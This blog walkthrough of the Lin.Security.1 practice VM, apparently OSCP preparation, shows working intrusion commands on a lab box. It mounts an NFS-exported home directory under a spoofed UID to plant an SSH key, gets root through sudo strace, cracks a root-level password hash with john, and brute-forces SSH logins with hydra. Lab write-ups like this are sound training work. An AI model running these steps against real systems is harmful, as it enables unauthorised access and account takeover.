Analytify (Bug): cURL error 77: error setting certificate verify locations: CAfile: /etc/nginx/ssl/cacert.pem CApath: /etc/ssl/certs (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for https://oauth2.googleapis.com/token Lin.Security.1 Walkthrough (OSCP Prep) - c0dedead.io

Lin.Security.1 Walkthrough (OSCP Prep)

Lin.Security.1 Walkthrough (OSCP Prep)

Host Discovery

First things first, let’s find the target on our network.

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ sudo arp-scan -l
Interface: ens33, type: EN10MB, MAC: 00:0c:29:4c:9e:c7, IPv4: 10.0.10.10
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.10.1       00:50:56:c0:00:08       VMware, Inc.
10.0.10.2       00:50:56:f3:16:00       VMware, Inc.
10.0.10.103     00:0c:29:ed:97:a9       VMware, Inc.
10.0.10.199     00:50:56:fa:ab:65       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.957 seconds (130.81 hosts/sec). 4 responded

We find the target machine at 10.0.10.103. We can update /etc/hosts to make things easier:

10.0.10.103     linsecurity

Scanning

Now let’s see what this host has open to us.

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ rustscan -a linsecurity -- -sV -oA scans/nmap-version
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.๐Ÿข

[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.10.103:22
Open 10.0.10.103:111
Open 10.0.10.103:2049
Open 10.0.10.103:34199
Open 10.0.10.103:45371
Open 10.0.10.103:47855
Open 10.0.10.103:60961
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-version" on ip 10.0.10.103
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-10 19:27 CST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 19:27
Scanning 10.0.10.103 [2 ports]
Completed Ping Scan at 19:27, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 19:27
Scanning linsecurity (10.0.10.103) [7 ports]
Discovered open port 111/tcp on 10.0.10.103
Discovered open port 22/tcp on 10.0.10.103
Discovered open port 45371/tcp on 10.0.10.103
Discovered open port 2049/tcp on 10.0.10.103
Discovered open port 60961/tcp on 10.0.10.103
Discovered open port 47855/tcp on 10.0.10.103
Discovered open port 34199/tcp on 10.0.10.103
Completed Connect Scan at 19:27, 0.00s elapsed (7 total ports)
Initiating Service scan at 19:27
Scanning 7 services on linsecurity (10.0.10.103)
Completed Service scan at 19:27, 6.01s elapsed (7 services on 1 host)
NSE: Script scanning 10.0.10.103.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.02s elapsed
Nmap scan report for linsecurity (10.0.10.103)
Host is up, received conn-refused (0.00025s latency).
Scanned at 2021-11-10 19:27:53 CST for 6s

PORT      STATE SERVICE  REASON  VERSION
22/tcp    open  ssh      syn-ack OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
111/tcp   open  rpcbind  syn-ack 2-4 (RPC #100000)
2049/tcp  open  nfs_acl  syn-ack 3 (RPC #100227)
34199/tcp open  mountd   syn-ack 1-3 (RPC #100005)
45371/tcp open  nlockmgr syn-ack 1-4 (RPC #100021)
47855/tcp open  mountd   syn-ack 1-3 (RPC #100005)
60961/tcp open  mountd   syn-ack 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.31 seconds

We see rpcbind running and a number of ports running mountd. The first thing we should do is enumerate any available network shares:

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ showmount -e linsecurity
Export list for linsecurity:
/home/peter *

We find what appears to be a user’s home directory shared across the network. If we can write to the directory, it should be fairly easy to get access to the machine.


Exploiting a Shared Home Directory

Let’s create a local directory and mount the network share:

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ mkdir peter

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ sudo mount -t nfs linsecurity:/home/peter ./peter -o nolock

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ cd peter

(ori0n@apophis) --> [ ~/linsecurity/peter ]
  ==> $ ls -la
drwx------@    - cvechecker inetsim 10 Jul  2018 ๏„• .cache
drwx------@    - cvechecker inetsim 10 Jul  2018 ๏„• .gnupg
drwxrwxr-x@    - cvechecker inetsim 10 Jul  2018 ๏„• .local
.rw-r--r--@  220 cvechecker inetsim  9 Jul  2018 ๏…› .bash_logout
.rw-r--r--@ 3.8k cvechecker inetsim  9 Jul  2018 ๏’‰ .bashrc
.rw-rw-r--@    0 cvechecker inetsim 10 Jul  2018 ๏…› .cloud-locale-test.skip
.rw-r--r--@  807 cvechecker inetsim  9 Jul  2018 ๏…› .profile

There is nothing immediately interesting here, but do we have write access?

(ori0n@apophis) --> [ ~/linsecurity/peter ]
  ==> $ mkdir .ssh
mkdir: cannot create directory โ€˜.sshโ€™: Permission denied

So we don’t have write access, but this is easy to get around. We need to log in (locally) as a user with the same user ID as the owner of this directory. The Uid is 1001 (if you don’t see this, you can verify with the stat utility). On my machine, you can see there is already a user cvechecker with this ID. If there is no such user on your machine, you can create one with useradd command with the -u option.

Now we should be able to start a shell with the correct user ID and write to the mounted directory:

(ori0n@apophis) --> [ ~/linsecurity/peter ]
  ==> $ sudo -u cvechecker bash
[cvechecker@apophis peter]$ mkdir .ssh

Now we can add our SSH public key to the .ssh/authorized_keys file and try to SSH in:

(ori0n@apophis) --> [ ~/linsecurity/peter ]
  ==> $ ssh -l peter linsecurity
Enter passphrase for key '/home/ori0n/.ssh/id_rsa':

โ–ˆโ–ˆโ•—     โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ•šโ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘    โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘   โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•  โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘     โ•šโ–ˆโ–ˆโ•”โ•
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘      โ–ˆโ–ˆโ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•โ•โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•   โ•šโ•โ•      โ•šโ•โ•
Welcome to lin.security | https://in.security | version 1.0

And we’re in!

There are a number of different routes to root on this box. I’ll cover three here.


Privilege Escalation – First Method

Having obtained access as user peter, let’s see if he has any sudo privileges on the machine:

peter@linsecurity:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User peter may run the following commands on linsecurity:
    (ALL) NOPASSWD: /usr/bin/strace

So he can run strace with superuser privileges. A quick check of GTFOBins shows this may be used to spawn a root shell. Let’s try it:

peter@linsecurity:~$ sudo strace -o /dev/null sh
# id
uid=0(root) gid=0(root) groups=0(root)

Well, that was easy!


Privilege Escalation – Second Method

That was too easy! Let’s see if we can find another way in. What other users are on the system?

peter@linsecurity:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
bob:x:1000:1004:bob:/home/bob:/bin/bash
statd:x:111:65534::/var/lib/nfs:/usr/sbin/nologin
peter:x:1001:1005:,,,:/home/peter:/bin/bash
insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh
susan:x:1002:1006:,,,:/home/susan:/bin/rbash

One thing that sticks out is the insecurity user. Beyond the username itself, there are two things of note:

  • The user’s UID:GID is 0:0 (root!)
  • The user’s password hash is clearly visible

So if we can crack this hash, we should be able to log in with root privileges! Since I’m running on a VM, I’ll use john to attempt to crack this hash:

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ echo AzER3pBZh6WZE > hash

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ john hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
--------------------------------------------------------------------------
The library attempted to open the following supporting CUDA libraries,
but each of them failed.  CUDA-aware support is disabled.
libcuda.so.1: cannot open shared object file: No such file or directory
libcuda.dylib: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.so.1: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.dylib: cannot open shared object file: No such file or directory
If you are not interested in CUDA-aware support, then run with
--mca opal_warn_on_missing_libcuda 0 to suppress this message.  If you are interested
in CUDA-aware support, then try setting LD_LIBRARY_PATH to the location
of libcuda.so.1 to get passed this issue.
--------------------------------------------------------------------------
Warning: detected hash type "descrypt", but the string is also recognized as "descrypt-opencl"
Use the "--format=descrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@ssw0rd         (?)
1g 0:00:00:00 DONE (2021-11-10 20:36) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s 123456..bibiana
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And we have the password: P@ssw0rd.

Does it work?

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ ssh -l insecurity linsecurity
insecurity@linsecurity's password:

โ–ˆโ–ˆโ•—     โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ•šโ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘    โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘   โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•  โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘     โ•šโ–ˆโ–ˆโ•”โ•
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘      โ–ˆโ–ˆโ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•โ•โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•   โ•šโ•โ•      โ•šโ•โ•
Welcome to lin.security | https://in.security | version 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

# id
uid=0(root) gid=0(root) groups=0(root)

Bingo!


Privilege Escalation – Third Method

Finally, let’s use the usernames we enumerated from /etc/passwd and see if we can crack any particularly bad passwords. Create a file (users.txt) with a list of the usernames we found:

bob
susan

I’ll ignore the peter and insecurity users because we already have access to them. Now, use hydra to try to brute-force a password. Since brute-forcing SSH is very slow, we will use a small wordlist:

(ori0n@apophis) --> [ ~/linsecurity ]
  ==> $ hydra -L users.txt -P /usr/share/seclists/Passwords/500-worst-passwords.txt linsecurity ssh -t 4
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-10 20:42:54
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1000 login tries (l:2/p:500), ~250 tries per task
[DATA] attacking ssh://linsecurity:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 956 to do in 00:22h, 4 active
[22][ssh] host: linsecurity   login: bob   password: secret

After a few minutes, we have creds: bob:secret. SSH in and see what Bob can do:

bob@linsecurity:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
        /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
        /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp

One has to wonder why not to just allow full sudo access if you’re going to allow all of these programs. GTFOBins will find ways to a root shell for many (if not all) of these programs, but we have shells available, so I’ll take the simplest route:

bob@linsecurity:~$ sudo sh
# id
uid=0(root) gid=0(root) groups=0(root)

And there you have it.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.